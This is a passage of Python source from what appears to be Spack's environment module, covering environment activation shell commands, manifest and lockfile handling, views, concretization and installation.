import spack.util.spack_json as sjson
import spack.util.spack_yaml as syaml
import spack.config
import spack.user_environment as uenv
from spack.filesystem_view import YamlFilesystemView
import spack.util.environment
import spack.architecture as architecture
from spack.spec import Spec
from spack.spec_list import SpecList, InvalidSpecConstraintError
from spack.variant import UnknownVariantError
import spack.util.lock as lk
from spack.util.path import substitute_path_variables
#: environment variable used to indicate the active environment
spack_env_var = 'SPACK_ENV'
#: currently activated environment
_active_environment = None
#: path where environments are stored in the spack tree
env_path = os.path.join(spack.paths.var_path, 'environments')
#: Name of the input yaml file for an environment
manifest_name = 'spack.yaml'
#: Name of the input yaml file for an environment
lockfile_name = 'spack.lock'
#: Name of the directory where environments store repos, logs, views
env_subdir_name = '.spack-env'
#: default spack.yaml file to put in new environments
default_manifest_yaml = """\
# This is a Spack Environment file.
#
# It describes a set of packages to be installed, along with
# configuration settings.
spack:
# add package specs to the `specs` list
specs: []
view: true
"""
#: regex for validating environment names
valid_environment_name_re = r'^\w[\w-]*$'
#: version of the lockfile format. Must increase monotonically.
lockfile_format_version = 2
# Magic names
# The name of the standalone spec list in the manifest yaml
user_speclist_name = 'specs'
# The name of the default view (the view loaded on env.activate)
default_view_name = 'default'
# Default behavior to link all packages into views (vs. only root packages)
default_view_link = 'all'
def valid_env_name(name):
return re.match(valid_environment_name_re, name)
def validate_env_name(name):
if not valid_env_name(name):
raise ValueError((
"'%s': names must start with a letter, and only contain "
"letters, numbers, _, and -.") % name)
return name
def activate(
env, use_env_repo=False, add_view=True, shell='sh', prompt=None
):
"""Activate an environment.
To activate an environment, we add its configuration scope to the
existing Spack configuration, and we set active to the current
environment.
Arguments:
env (Environment): the environment to activate
use_env_repo (bool): use the packages exactly as they appear in the
environment's repository
add_view (bool): generate commands to add view to path variables
shell (string): One of `sh`, `csh`, `fish`.
prompt (string): string to add to the users prompt, or None
Returns:
cmds: Shell commands to activate environment.
TODO: environment to use the activated spack environment.
"""
global _active_environment
_active_environment = env
prepare_config_scope(_active_environment)
if use_env_repo:
spack.repo.path.put_first(_active_environment.repo)
tty.debug("Using environmennt '%s'" % _active_environment.name)
# Construct the commands to run
cmds = ''
if shell == 'csh':
# TODO: figure out how to make color work for csh
cmds += 'setenv SPACK_ENV %s;\n' % env.path
cmds += 'alias despacktivate "spack env deactivate";\n'
if prompt:
cmds += 'if (! $?SPACK_OLD_PROMPT ) '
cmds += 'setenv SPACK_OLD_PROMPT "${prompt}";\n'
cmds += 'set prompt="%s ${prompt}";\n' % prompt
elif shell == 'fish':
if os.getenv('TERM') and 'color' in os.getenv('TERM') and prompt:
prompt = colorize('@G{%s} ' % prompt, color=True)
cmds += 'set -gx SPACK_ENV %s;\n' % env.path
cmds += 'function despacktivate;\n'
cmds += ' spack env deactivate;\n'
cmds += 'end;\n'
#
# NOTE: We're not changing the fish_prompt function (which is fish's
# solution to the PS1 variable) here. This is a bit fiddly, and easy to
        # screw up => spend time researching a solution. Feedback welcome.
#
else:
if os.getenv('TERM') and 'color' in os.getenv('TERM') and prompt:
prompt = colorize('@G{%s} ' % prompt, color=True)
cmds += 'export SPACK_ENV=%s;\n' % env.path
cmds += "alias despacktivate='spack env deactivate';\n"
if prompt:
cmds += 'if [ -z ${SPACK_OLD_PS1+x} ]; then\n'
cmds += ' if [ -z ${PS1+x} ]; then\n'
cmds += " PS1='$$$$';\n"
cmds += ' fi;\n'
cmds += ' export SPACK_OLD_PS1="${PS1}";\n'
cmds += 'fi;\n'
cmds += 'export PS1="%s ${PS1}";\n' % prompt
#
# NOTE in the fish-shell: Path variables are a special kind of variable
# used to support colon-delimited path lists including PATH, CDPATH,
# MANPATH, PYTHONPATH, etc. All variables that end in PATH (case-sensitive)
# become PATH variables.
#
try:
if add_view and default_view_name in env.views:
with spack.store.db.read_transaction():
cmds += env.add_default_view_to_shell(shell)
except (spack.repo.UnknownPackageError,
spack.repo.UnknownNamespaceError) as e:
tty.error(e)
tty.die(
'Environment view is broken due to a missing package or repo.\n',
' To activate without views enabled, activate with:\n',
' spack env activate -V {0}\n'.format(env.name),
' To remove it and resolve the issue, '
'force concretize with the command:\n',
' spack -e {0} concretize --force'.format(env.name))
return cmds
def deactivate(shell='sh'):
"""Undo any configuration or repo settings modified by ``activate()``.
Arguments:
shell (string): One of `sh`, `csh`, `fish`. Shell style to use.
Returns:
(string): shell commands for `shell` to undo environment variables
"""
global _active_environment
if not _active_environment:
return
deactivate_config_scope(_active_environment)
# use _repo so we only remove if a repo was actually constructed
if _active_environment._repo:
spack.repo.path.remove(_active_environment._repo)
cmds = ''
if shell == 'csh':
cmds += 'unsetenv SPACK_ENV;\n'
cmds += 'if ( $?SPACK_OLD_PROMPT ) '
cmds += 'set prompt="$SPACK_OLD_PROMPT" && '
cmds += 'unsetenv SPACK_OLD_PROMPT;\n'
cmds += 'unalias despacktivate;\n'
elif shell == 'fish':
cmds += 'set -e SPACK_ENV;\n'
cmds += 'functions -e despacktivate;\n'
#
# NOTE: Not changing fish_prompt (above) => no need to restore it here.
#
else:
cmds += 'if [ ! -z ${SPACK_ENV+x} ]; then\n'
cmds += 'unset SPACK_ENV; export SPACK_ENV;\n'
cmds += 'fi;\n'
cmds += 'unalias despacktivate;\n'
cmds += 'if [ ! -z ${SPACK_OLD_PS1+x} ]; then\n'
cmds += ' if [ "$SPACK_OLD_PS1" = \'$$$$\' ]; then\n'
cmds += ' unset PS1; export PS1;\n'
cmds += ' else\n'
cmds += ' export PS1="$SPACK_OLD_PS1";\n'
cmds += ' fi;\n'
cmds += ' unset SPACK_OLD_PS1; export SPACK_OLD_PS1;\n'
cmds += 'fi;\n'
try:
if default_view_name in _active_environment.views:
with spack.store.db.read_transaction():
cmds += _active_environment.rm_default_view_from_shell(shell)
except (spack.repo.UnknownPackageError,
spack.repo.UnknownNamespaceError) as e:
tty.warn(e)
tty.warn('Could not fully deactivate view due to missing package '
'or repo, shell environment may be corrupt.')
tty.debug("Deactivated environmennt '%s'" % _active_environment.name)
_active_environment = None
return cmds
def find_environment(args):
"""Find active environment from args, spack.yaml, or environment variable.
This is called in ``spack.main`` to figure out which environment to
activate.
Check for an environment in this order:
1. via ``spack -e ENV`` or ``spack -D DIR`` (arguments)
2. as a spack.yaml file in the current directory, or
3. via a path in the SPACK_ENV environment variable.
If an environment is found, read it in. If not, return None.
Arguments:
        args (Namespace): argparse namespace with command arguments
Returns:
(Environment): a found environment, or ``None``
"""
# try arguments
env = getattr(args, 'env', None)
# treat env as a name
if env:
if exists(env):
return read(env)
else:
        # if env was specified, see if it is a directory; otherwise, look
# at env_dir (env and env_dir are mutually exclusive)
env = getattr(args, 'env_dir', None)
# if no argument, look for the environment variable
if not env:
env = os.environ.get(spack_env_var)
# nothing was set; there's no active environment
if not env:
return None
# if we get here, env isn't the name of a spack environment; it has
# to be a path to an environment, or there is something wrong.
if is_env_dir(env):
return Environment(env)
raise SpackEnvironmentError('no environment in %s' % env)
def get_env(args, cmd_name, required=False):
"""Used by commands to get the active environment.
This first checks for an ``env`` argument, then looks at the
``active`` environment. We check args first because Spack's
subcommand arguments are parsed *after* the ``-e`` and ``-D``
arguments to ``spack``. So there may be an ``env`` argument that is
*not* the active environment, and we give it precedence.
This is used by a number of commands for determining whether there is
an active environment.
If an environment is not found *and* is required, print an error
message that says the calling command *needs* an active environment.
Arguments:
        args (Namespace): argparse namespace with command arguments
cmd_name (str): name of calling command
required (bool): if ``True``, raise an exception when no environment
is found; if ``False``, just return ``None``
Returns:
(Environment): if there is an arg or active environment
"""
# try argument first
env = getattr(args, 'env', None)
if env:
if exists(env):
return read(env)
elif is_env_dir(env):
return Environment(env)
else:
raise SpackEnvironmentError('no environment in %s' % env)
# try the active environment. This is set by find_environment() (above)
if _active_environment:
return _active_environment
elif not required:
return None
else:
tty.die(
'`spack %s` requires an environment' % cmd_name,
'activate an environment first:',
' spack env activate ENV',
'or use:',
' spack -e ENV %s ...' % cmd_name)
def _root(name):
"""Non-validating version of root(), to be used internally."""
return os.path.join(env_path, name)
def root(name):
"""Get the root directory for an environment by name."""
validate_env_name(name)
return _root(name)
def exists(name):
"""Whether an environment with this name exists or not."""
if not valid_env_name(name):
return False
return os.path.isdir(root(name))
def active(name):
"""True if the named environment is active."""
return _active_environment and name == _active_environment.name
def is_env_dir(path):
"""Whether a directory contains a spack environment."""
return os.path.isdir(path) and os.path.exists(
os.path.join(path, manifest_name))
def read(name):
"""Get an environment with the supplied name."""
validate_env_name(name)
if not exists(name):
raise SpackEnvironmentError("no such environment '%s'" % name)
return Environment(root(name))
def create(name, init_file=None, with_view=None):
"""Create a named environment in Spack."""
validate_env_name(name)
if exists(name):
raise SpackEnvironmentError("'%s': environment already exists" % name)
return Environment(root(name), init_file, with_view)
def config_dict(yaml_data):
"""Get the configuration scope section out of an spack.yaml"""
key = spack.config.first_existing(yaml_data, spack.schema.env.keys)
return yaml_data[key]
def all_environment_names():
"""List the names of environments that currently exist."""
# just return empty if the env path does not exist. A read-only
# operation like list should not try to create a directory.
if not os.path.exists(env_path):
return []
candidates = sorted(os.listdir(env_path))
names = []
for candidate in candidates:
yaml_path = os.path.join(_root(candidate), manifest_name)
if valid_env_name(candidate) and os.path.exists(yaml_path):
names.append(candidate)
return names
def all_environments():
"""Generator for all named Environments."""
for name in all_environment_names():
yield read(name)
def _read_yaml(str_or_file):
"""Read YAML from a file for round-trip parsing."""
data = syaml.load_config(str_or_file)
filename = getattr(str_or_file, 'name', None)
default_data = spack.config.validate(
data, spack.schema.env.schema, filename)
return (data, default_data)
def _write_yaml(data, str_or_file):
"""Write YAML to a file preserving comments and dict order."""
filename = getattr(str_or_file, 'name', None)
spack.config.validate(data, spack.schema.env.schema, filename)
syaml.dump_config(data, str_or_file, default_flow_style=False)
def _eval_conditional(string):
"""Evaluate conditional definitions using restricted variable scope."""
arch = architecture.Arch(
architecture.platform(), 'default_os', 'default_target')
arch_spec = spack.spec.Spec('arch=%s' % arch)
valid_variables = {
'target': str(arch.target),
'os': str(arch.os),
'platform': str(arch.platform),
'arch': arch_spec,
'architecture': arch_spec,
'arch_str': str(arch),
're': re,
'env': os.environ,
'hostname': socket.gethostname()
}
return eval(string, valid_variables)
class ViewDescriptor(object):
def __init__(self, base_path, root, projections={}, select=[], exclude=[],
link=default_view_link):
self.base = base_path
self.root = root
self.projections = projections
self.select = select
self.select_fn = lambda x: any(x.satisfies(s) for s in self.select)
self.exclude = exclude
self.exclude_fn = lambda x: not any(x.satisfies(e)
for e in self.exclude)
self.link = link
def __eq__(self, other):
return all([self.root == other.root,
self.projections == other.projections,
self.select == other.select,
self.exclude == other.exclude,
self.link == other.link])
def to_dict(self):
ret = {'root': self.root}
if self.projections:
ret['projections'] = self.projections
if self.select:
ret['select'] = self.select
if self.exclude:
ret['exclude'] = self.exclude
if self.link != default_view_link:
ret['link'] = self.link
return ret
@staticmethod
def from_dict(base_path, d):
return ViewDescriptor(base_path,
d['root'],
d.get('projections', {}),
d.get('select', []),
d.get('exclude', []),
d.get('link', default_view_link))
def view(self):
root = self.root
if not os.path.isabs(root):
root = os.path.normpath(os.path.join(self.base, self.root))
return YamlFilesystemView(root, spack.store.layout,
ignore_conflicts=True,
projections=self.projections)
def __contains__(self, spec):
"""Is the spec described by the view descriptor
Note: This does not claim the spec is already linked in the view.
It merely checks that the spec is selected if a select operation is
specified and is not excluded if an exclude operator is specified.
"""
if self.select:
if not self.select_fn(spec):
return False
if self.exclude:
if not self.exclude_fn(spec):
return False
return True
def regenerate(self, all_specs, roots):
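        # select the specs that belong in the view: every spec in the environment,
        # or only the roots, depending on the view's link setting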
specs_for_view = []
specs = all_specs if self.link == 'all' else roots
for spec in specs:
# The view does not store build deps, so if we want it to
# recognize environment specs (which do store build deps),
# then they need to be stripped.
if spec.concrete: # Do not link unconcretized roots
# We preserve _hash _normal to avoid recomputing DAG
# hashes (DAG hashes don't consider build deps)
spec_copy = spec.copy(deps=('link', 'run'))
spec_copy._hash = spec._hash
spec_copy._normal = spec._normal
specs_for_view.append(spec_copy)
# regeneration queries the database quite a bit; this read
# transaction ensures that we don't repeatedly lock/unlock.
with spack.store.db.read_transaction():
installed_specs_for_view = set(
s for s in specs_for_view if s in self and s.package.installed)
# To ensure there are no conflicts with packages being installed
# that cannot be resolved or have repos that have been removed
# we always regenerate the view from scratch. We must first make
# sure the root directory exists for the very first time though.
root = self.root
if not os.path.isabs(root):
root = os.path.normpath(os.path.join(self.base, self.root))
fs.mkdirp(root)
with fs.replace_directory_transaction(root):
view = self.view()
view.clean()
specs_in_view = set(view.get_all_specs())
tty.msg("Updating view at {0}".format(self.root))
rm_specs = specs_in_view - installed_specs_for_view
add_specs = installed_specs_for_view - specs_in_view
# pass all_specs in, as it's expensive to read all the
# spec.yaml files twice.
view.remove_specs(*rm_specs, with_dependents=False,
all_specs=specs_in_view)
view.add_specs(*add_specs, with_dependencies=False)
class Environment(object):
def __init__(self, path, init_file=None, with_view=None):
"""Create a new environment.
The environment can be optionally initialized with either a
spack.yaml or spack.lock file.
Arguments:
path (str): path to the root directory of this environment
init_file (str or file object): filename or file object to
initialize the environment
with_view (str or bool): whether a view should be maintained for
the environment. If the value is a string, it specifies the
path to the view.
"""
self.path = os.path.abspath(path)
self.txlock = lk.Lock(self._transaction_lock_path)
# This attribute will be set properly from configuration
# during concretization
self.concretization = None
self.clear()
if init_file:
# If we are creating the environment from an init file, we don't
# need to lock, because there are no Spack operations that alter
# the init file.
with fs.open_if_filename(init_file) as f:
if hasattr(f, 'name') and f.name.endswith('.lock'):
self._read_manifest(default_manifest_yaml)
self._read_lockfile(f)
self._set_user_specs_from_lockfile()
else:
self._read_manifest(f, raw_yaml=default_manifest_yaml)
else:
with lk.ReadTransaction(self.txlock):
self._read()
if with_view is False:
self.views = {}
elif with_view is True:
self.views = {
default_view_name: ViewDescriptor(self.path,
self.view_path_default)}
elif isinstance(with_view, six.string_types):
self.views = {default_view_name: ViewDescriptor(self.path,
with_view)}
# If with_view is None, then defer to the view settings determined by
# the manifest file
def _re_read(self):
"""Reinitialize the environment object if it has been written (this
may not be true if the environment was just created in this running
instance of Spack)."""
if not os.path.exists(self.manifest_path):
return
self.clear()
self._read()
def _read(self):
default_manifest = not os.path.exists(self.manifest_path)
if default_manifest:
# No manifest, use default yaml
self._read_manifest(default_manifest_yaml)
else:
with open(self.manifest_path) as f:
self._read_manifest(f)
if os.path.exists(self.lock_path):
with open(self.lock_path) as f:
read_lock_version = self._read_lockfile(f)
if default_manifest:
# No manifest, set user specs from lockfile
self._set_user_specs_from_lockfile()
if read_lock_version == 1:
tty.debug(
"Storing backup of old lockfile {0} at {1}".format(
self.lock_path, self._lock_backup_v1_path))
shutil.copy(self.lock_path, self._lock_backup_v1_path)
def write_transaction(self):
"""Get a write lock context manager for use in a `with` block."""
return lk.WriteTransaction(self.txlock, acquire=self._re_read)
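    # Usage sketch (hypothetical): mutate the environment only inside the
    # transaction so concurrent Spack processes see a consistent manifest.
    #
    #     >>> with env.write_transaction():
    #     ...     env.add('zlib')
    #     ...     env.write()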
def _read_manifest(self, f, raw_yaml=None):
"""Read manifest file and set up user specs."""
if raw_yaml:
_, self.yaml = _read_yaml(f)
self.raw_yaml, _ = _read_yaml(raw_yaml)
else:
self.raw_yaml, self.yaml = _read_yaml(f)
self.spec_lists = OrderedDict()
for item in config_dict(self.yaml).get('definitions', []):
entry = copy.deepcopy(item)
when = _eval_conditional(entry.pop('when', 'True'))
assert len(entry) == 1
if when:
name, spec_list = next(iter(entry.items()))
user_specs = SpecList(name, spec_list, self.spec_lists.copy())
if name in self.spec_lists:
self.spec_lists[name].extend(user_specs)
else:
self.spec_lists[name] = user_specs
spec_list = config_dict(self.yaml).get(user_speclist_name)
user_specs = SpecList(user_speclist_name, [s for s in spec_list if s],
self.spec_lists.copy())
self.spec_lists[user_speclist_name] = user_specs
enable_view = config_dict(self.yaml).get('view')
# enable_view can be boolean, string, or None
if enable_view is True or enable_view is None:
self.views = {
default_view_name: ViewDescriptor(self.path,
self.view_path_default)}
elif isinstance(enable_view, six.string_types):
self.views = {default_view_name: ViewDescriptor(self.path,
enable_view)}
elif enable_view:
path = self.path
self.views = dict((name, ViewDescriptor.from_dict(path, values))
for name, values in enable_view.items())
else:
self.views = {}
# Retrieve the current concretization strategy
configuration = config_dict(self.yaml)
self.concretization = configuration.get('concretization')
@property
def user_specs(self):
return self.spec_lists[user_speclist_name]
def _set_user_specs_from_lockfile(self):
"""Copy user_specs from a read-in lockfile."""
self.spec_lists = {
user_speclist_name: SpecList(
user_speclist_name,
[str(s) for s in self.concretized_user_specs]
)
}
def clear(self):
self.spec_lists = {user_speclist_name: SpecList()} # specs from yaml
self.concretized_user_specs = [] # user specs from last concretize
self.concretized_order = [] # roots of last concretize, in order
self.specs_by_hash = {} # concretized specs by hash
self.new_specs = [] # write packages for these on write()
self._repo = None # RepoPath for this env (memoized)
self._previous_active = None # previously active environment
@property
def internal(self):
"""Whether this environment is managed by Spack."""
return self.path.startswith(env_path)
@property
def name(self):
"""Human-readable representation of the environment.
This is the path for directory environments, and just the name
for named environments.
"""
if self.internal:
return os.path.basename(self.path)
else:
return self.path
@property
def active(self):
"""True if this environment is currently active."""
return _active_environment and self.path == _active_environment.path
@property
def manifest_path(self):
"""Path to spack.yaml file in this environment."""
return os.path.join(self.path, manifest_name)
@property
def _transaction_lock_path(self):
"""The location of the lock file used to synchronize multiple
processes updating the same environment.
"""
return os.path.join(self.env_subdir_path, 'transaction_lock')
@property
def lock_path(self):
"""Path to spack.lock file in this environment."""
return os.path.join(self.path, lockfile_name)
@property
def _lock_backup_v1_path(self):
"""Path to backup of v1 lockfile before conversion to v2"""
return self.lock_path + '.backup.v1'
@property
def env_subdir_path(self):
"""Path to directory where the env stores repos, logs, views."""
return os.path.join(self.path, env_subdir_name)
@property
def repos_path(self):
return os.path.join(self.path, env_subdir_name, 'repos')
@property
def log_path(self):
return os.path.join(self.path, env_subdir_name, 'logs')
@property
def view_path_default(self):
# default path for environment views
return os.path.join(self.env_subdir_path, 'view')
@property
def repo(self):
if self._repo is None:
self._repo = make_repo_path(self.repos_path)
return self._repo
def included_config_scopes(self):
"""List of included configuration scopes from the environment.
Scopes are listed in the YAML file in order from highest to
        lowest precedence, so configuration from earlier scopes will take
precedence over later ones.
This routine returns them in the order they should be pushed onto
the internal scope stack (so, in reverse, from lowest to highest).
"""
scopes = []
# load config scopes added via 'include:', in reverse so that
# highest-precedence scopes are last.
includes = config_dict(self.yaml).get('include', [])
for i, config_path in enumerate(reversed(includes)):
# allow paths to contain spack config/environment variables, etc.
config_path = substitute_path_variables(config_path)
# treat relative paths as relative to the environment
if not os.path.isabs(config_path):
config_path = os.path.join(self.path, config_path)
config_path = os.path.normpath(os.path.realpath(config_path))
if os.path.isdir(config_path):
# directories are treated as regular ConfigScopes
config_name = 'env:%s:%s' % (
self.name, os.path.basename(config_path))
scope = spack.config.ConfigScope(config_name, config_path)
else:
# files are assumed to be SingleFileScopes
base, ext = os.path.splitext(os.path.basename(config_path))
config_name = 'env:%s:%s' % (self.name, base)
scope = spack.config.SingleFileScope(
config_name, config_path, spack.schema.merged.schema)
scopes.append(scope)
return scopes
def env_file_config_scope_name(self):
"""Name of the config scope of this environment's manifest file."""
return 'env:%s' % self.name
def env_file_config_scope(self):
"""Get the configuration scope for the environment's manifest file."""
config_name = self.env_file_config_scope_name()
return spack.config.SingleFileScope(config_name,
self.manifest_path,
spack.schema.env.schema,
[spack.schema.env.keys])
def config_scopes(self):
"""A list of all configuration scopes for this environment."""
return self.included_config_scopes() + [self.env_file_config_scope()]
def set_config(self, path, value):
"""Set configuration for this environment"""
yaml = config_dict(self.yaml)
keys = spack.config.process_config_path(path)
for key in keys[:-1]:
yaml = yaml[key]
yaml[keys[-1]] = value
self.write()
def destroy(self):
"""Remove this environment from Spack entirely."""
shutil.rmtree(self.path)
def update_stale_references(self, from_list=None):
"""Iterate over spec lists updating references."""
if not from_list:
from_list = next(iter(self.spec_lists.keys()))
index = list(self.spec_lists.keys()).index(from_list)
# spec_lists is an OrderedDict, all list entries after the modified
# list may refer to the modified list. Update stale references
for i, (name, speclist) in enumerate(
list(self.spec_lists.items())[index + 1:], index + 1
):
new_reference = dict((n, self.spec_lists[n])
for n in list(self.spec_lists.keys())[:i])
speclist.update_reference(new_reference)
def add(self, user_spec, list_name=user_speclist_name):
"""Add a single user_spec (non-concretized) to the Environment
Returns:
(bool): True if the spec was added, False if it was already
present and did not need to be added
"""
spec = Spec(user_spec)
if list_name not in self.spec_lists:
raise SpackEnvironmentError(
'No list %s exists in environment %s' % (list_name, self.name)
)
if list_name == user_speclist_name:
if not spec.name:
raise SpackEnvironmentError(
'cannot add anonymous specs to an environment!')
elif not spack.repo.path.exists(spec.name):
virtuals = spack.repo.path.provider_index.providers.keys()
if spec.name not in virtuals:
msg = 'no such package: %s' % spec.name
raise SpackEnvironmentError(msg)
list_to_change = self.spec_lists[list_name]
existing = str(spec) in list_to_change.yaml_list
if not existing:
list_to_change.add(str(spec))
self.update_stale_references(list_name)
return bool(not existing)
def remove(self, query_spec, list_name=user_speclist_name, force=False):
"""Remove specs from an environment that match a query_spec"""
query_spec = Spec(query_spec)
list_to_change = self.spec_lists[list_name]
matches = []
if not query_spec.concrete:
matches = [s for s in list_to_change if s.satisfies(query_spec)]
if not matches:
# concrete specs match against concrete specs in the env
# by *dag hash*, not build hash.
dag_hashes_in_order = [
self.specs_by_hash[build_hash].dag_hash()
for build_hash in self.concretized_order
]
specs_hashes = zip(
self.concretized_user_specs, dag_hashes_in_order
)
matches = [
s for s, h in specs_hashes
if query_spec.dag_hash() == h
]
if not matches:
raise SpackEnvironmentError(
"Not found: {0}".format(query_spec))
old_specs = set(self.user_specs)
new_specs = set()
for spec in matches:
if spec in list_to_change:
try:
list_to_change.remove(spec)
self.update_stale_references(list_name)
new_specs = set(self.user_specs)
except spack.spec_list.SpecListError:
# define new specs list
new_specs = set(self.user_specs)
msg = "Spec '%s' is part of a spec matrix and " % spec
msg += "cannot be removed from list '%s'." % list_to_change
if force:
msg += " It will be removed from the concrete specs."
# Mock new specs so we can remove this spec from
# concrete spec lists
new_specs.remove(spec)
tty.warn(msg)
# If force, update stale concretized specs
for spec in old_specs - new_specs:
if force and spec in self.concretized_user_specs:
i = self.concretized_user_specs.index(spec)
del self.concretized_user_specs[i]
dag_hash = self.concretized_order[i]
del self.concretized_order[i]
del self.specs_by_hash[dag_hash]
def concretize(self, force=False):
"""Concretize user_specs in this environment.
Only concretizes specs that haven't been concretized yet unless
force is ``True``.
This only modifies the environment in memory. ``write()`` will
write out a lockfile containing concretized specs.
Arguments:
force (bool): re-concretize ALL specs, even those that were
already concretized
Returns:
List of specs that have been concretized. Each entry is a tuple of
the user spec and the corresponding concretized spec.
"""
if force:
# Clear previously concretized specs
self.concretized_user_specs = []
self.concretized_order = []
self.specs_by_hash = {}
# Pick the right concretization strategy
if self.concretization == 'together':
return self._concretize_together()
if self.concretization == 'separately':
return self._concretize_separately()
msg = 'concretization strategy not implemented [{0}]'
raise SpackEnvironmentError(msg.format(self.concretization))
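    # Usage sketch (hypothetical): the strategy comes from the manifest's
    # "concretization" setting, so the same call covers both code paths below.
    #
    #     >>> with env.write_transaction():
    #     ...     env.concretize(force=True)
    #     ...     env.write()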
def _concretize_together(self):
"""Concretization strategy that concretizes all the specs
in the same DAG.
"""
# Exit early if the set of concretized specs is the set of user specs
user_specs_did_not_change = not bool(
set(self.user_specs) - set(self.concretized_user_specs)
)
if user_specs_did_not_change:
return []
# Check that user specs don't have duplicate packages
counter = collections.defaultdict(int)
for user_spec in self.user_specs:
counter[user_spec.name] += 1
duplicates = []
for name, count in counter.items():
if count > 1:
duplicates.append(name)
if duplicates:
            msg = ('environments that are configured to concretize specs'
' together cannot contain more than one spec for each'
' package [{0}]'.format(', '.join(duplicates)))
raise SpackEnvironmentError(msg)
# Proceed with concretization
self.concretized_user_specs = []
self.concretized_order = []
self.specs_by_hash = {}
concrete_specs = spack.concretize.concretize_specs_together(
*self.user_specs
)
concretized_specs = [x for x in zip(self.user_specs, concrete_specs)]
for abstract, concrete in concretized_specs:
self._add_concrete_spec(abstract, concrete)
return concretized_specs
def _concretize_separately(self):
"""Concretization strategy that concretizes separately one
user spec after the other.
"""
# keep any concretized specs whose user specs are still in the manifest
old_concretized_user_specs = self.concretized_user_specs
old_concretized_order = self.concretized_order
old_specs_by_hash = self.specs_by_hash
self.concretized_user_specs = []
self.concretized_order = []
self.specs_by_hash = {}
for s, h in zip(old_concretized_user_specs, old_concretized_order):
if s in self.user_specs:
concrete = old_specs_by_hash[h]
self._add_concrete_spec(s, concrete, new=False)
# Concretize any new user specs that we haven't concretized yet
concretized_specs = []
for uspec, uspec_constraints in zip(
self.user_specs, self.user_specs.specs_as_constraints):
if uspec not in old_concretized_user_specs:
concrete = _concretize_from_constraints(uspec_constraints)
self._add_concrete_spec(uspec, concrete)
concretized_specs.append((uspec, concrete))
return concretized_specs
def concretize_and_add(self, user_spec, concrete_spec=None):
"""Concretize and add a single spec to the environment.
Concretize the provided ``user_spec`` and add it along with the
concretized result to the environment. If the given ``user_spec`` was
already present in the environment, this does not add a duplicate.
The concretized spec will be added unless the ``user_spec`` was
already present and an associated concrete spec was already present.
Args:
concrete_spec: if provided, then it is assumed that it is the
result of concretizing the provided ``user_spec``
"""
if self.concretization == 'together':
msg = 'cannot install a single spec in an environment that is ' \
'configured to be concretized together. Run instead:\n\n' \
' $ spack add <spec>\n' \
' $ spack install\n'
raise SpackEnvironmentError(msg)
spec = Spec(user_spec)
if self.add(spec):
concrete = concrete_spec or spec.concretized()
self._add_concrete_spec(spec, concrete)
else:
# spec might be in the user_specs, but not installed.
# TODO: Redo name-based comparison for old style envs
spec = next(
s for s in self.user_specs if s.satisfies(user_spec)
)
concrete = self.specs_by_hash.get(spec.build_hash())
if not concrete:
concrete = spec.concretized()
self._add_concrete_spec(spec, concrete)
return concrete
@property
def default_view(self):
if not self.views:
raise SpackEnvironmentError(
"{0} does not have a view enabled".format(self.name))
if default_view_name not in self.views:
raise SpackEnvironmentError(
"{0} does not have a default view enabled".format(self.name))
return self.views[default_view_name]
def update_default_view(self, viewpath):
name = default_view_name
if name in self.views and self.default_view.root != viewpath:
shutil.rmtree(self.default_view.root)
if viewpath:
if name in self.views:
self.default_view.root = viewpath
else:
self.views[name] = ViewDescriptor(self.path, viewpath)
else:
self.views.pop(name, None)
def regenerate_views(self):
if not self.views:
tty.debug("Skip view update, this environment does not"
" maintain a view")
return
specs = self._get_environment_specs()
for view in self.views.values():
view.regenerate(specs, self.roots())
def check_views(self):
"""Checks if the environments default view can be activated."""
try:
# This is effectively a no-op, but it touches all packages in the
# default view if they are installed.
for view_name, view in self.views.items():
for _, spec in self.concretized_specs():
if spec in view and spec.package.installed:
tty.debug(
'Spec %s in view %s' % (spec.name, view_name))
except (spack.repo.UnknownPackageError,
spack.repo.UnknownNamespaceError) as e:
tty.warn(e)
tty.warn(
'Environment %s includes out of date packages or repos. '
'Loading the environment view will require reconcretization.'
% self.name)
def _env_modifications_for_default_view(self, reverse=False):
all_mods = spack.util.environment.EnvironmentModifications()
errors = []
for _, spec in self.concretized_specs():
if spec in self.default_view and spec.package.installed:
try:
mods = uenv.environment_modifications_for_spec(
spec, self.default_view)
except Exception as e:
msg = ("couldn't get environment settings for %s"
% spec.format("{name}@{version} /{hash:7}"))
errors.append((msg, str(e)))
continue
all_mods.extend(mods.reversed() if reverse else mods)
return all_mods, errors
def add_default_view_to_shell(self, shell):
env_mod = spack.util.environment.EnvironmentModifications()
if default_view_name not in self.views:
# No default view to add to shell
return env_mod.shell_modifications(shell)
env_mod.extend(uenv.unconditional_environment_modifications(
self.default_view))
mods, errors = self._env_modifications_for_default_view()
env_mod.extend(mods)
if errors:
for err in errors:
tty.warn(*err)
# deduplicate paths from specs mapped to the same location
for env_var in env_mod.group_by_name():
env_mod.prune_duplicate_paths(env_var)
return env_mod.shell_modifications(shell)
def rm_default_view_from_shell(self, shell):
env_mod = spack.util.environment.EnvironmentModifications()
if default_view_name not in self.views:
# No default view to add to shell
return env_mod.shell_modifications(shell)
env_mod.extend(uenv.unconditional_environment_modifications(
self.default_view).reversed())
mods, _ = self._env_modifications_for_default_view(reverse=True)
env_mod.extend(mods)
return env_mod.shell_modifications(shell)
def _add_concrete_spec(self, spec, concrete, new=True):
"""Called when a new concretized spec is added to the environment.
This ensures that all internal data structures are kept in sync.
Arguments:
spec (Spec): user spec that resulted in the concrete spec
concrete (Spec): spec concretized within this environment
new (bool): whether to write this spec's package to the env
repo on write()
"""
assert concrete.concrete
# when a spec is newly concretized, we need to make a note so
# that we can write its package to the env repo on write()
if new:
self.new_specs.append(concrete)
# update internal lists of specs
self.concretized_user_specs.append(spec)
h = concrete.build_hash()
self.concretized_order.append(h)
self.specs_by_hash[h] = concrete
def install(self, user_spec, concrete_spec=None, **install_args):
"""Install a single spec into an environment.
This will automatically concretize the single spec, but it won't
affect other as-yet unconcretized specs.
"""
concrete = self.concretize_and_add(user_spec, concrete_spec)
self._install(concrete, **install_args)
def _install(self, spec, **install_args):
# "spec" must be concrete
spec.package.do_install(**install_args)
if not spec.external:
# Make sure log directory exists
log_path = self.log_path
fs.mkdirp(log_path)
with fs.working_dir(self.path):
# Link the resulting log file into logs dir
build_log_link = os.path.join(
log_path, '%s-%s.log' % (spec.name, spec.dag_hash(7)))
if os.path.lexists(build_log_link):
os.remove(build_log_link)
os.symlink(spec.package.build_log_path, build_log_link)
def install_all(self, args=None):
"""Install all concretized specs in an environment.
Note: this does not regenerate the views for the environment;
that needs to be done separately with a call to write().
"""
# If "spack install" is invoked repeatedly for a large environment
# where all specs are already installed, the operation can take
